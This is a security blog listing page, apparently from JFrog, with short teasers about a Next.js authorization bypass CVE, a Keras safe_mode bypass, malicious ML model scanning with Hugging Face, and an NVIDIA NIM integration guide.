Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

CVE-2025-29927 - Authorization Bypass Vulnerability in Next.js: All You Need to Know

On March 21st, 2025, the Next.js maintainers announced a new authorization bypass vulnerability – CVE-2025-29927. This vulnerability can be easily exploited to achieve authorization bypass. In some cases – exploitation of the vulnerability can also lead to cache poisoning and denial of service.

Is TensorFlow Keras "Safe Mode" Actually Safe? Bypassing safe_mode Mitigation to Achieve Arbitrary Code Execution

Update: This issue was discovered and disclosed independently to Keras by JFrog’s research team and Peng Zhou. Machine learning frameworks often rely on serialization and deserialization mechanisms to store and load models. However, improper code isolation and executable components in the models can lead to severe security risks. The structure of the Keras v3 ML Model in TensorFlow.

JFrog and Hugging Face Join Forces to Expose Malicious ML Models

ML operations, data scientists, and developers currently face critical security challenges on multiple fronts. First, staying up to date with evolving attack techniques requires constant vigilance and security know-how, which can only be achieved by a dedicated security team. Second, existing ML model scanning engines suffer from a staggering rate of false positives.

Accelerating Enterprise AI Development: A Guide to the JFrog-NVIDIA NIM Integration

Enterprises are racing to integrate AI into applications, yet transitioning from prototype to production remains challenging. Managing ML models efficiently while ensuring security and governance is a critical challenge. JFrog’s integration with NVIDIA NIM addresses these issues by applying enterprise-grade DevSecOps practices to AI development. Before exploring this solution further, let’s examine the core MLOps challenges it solves.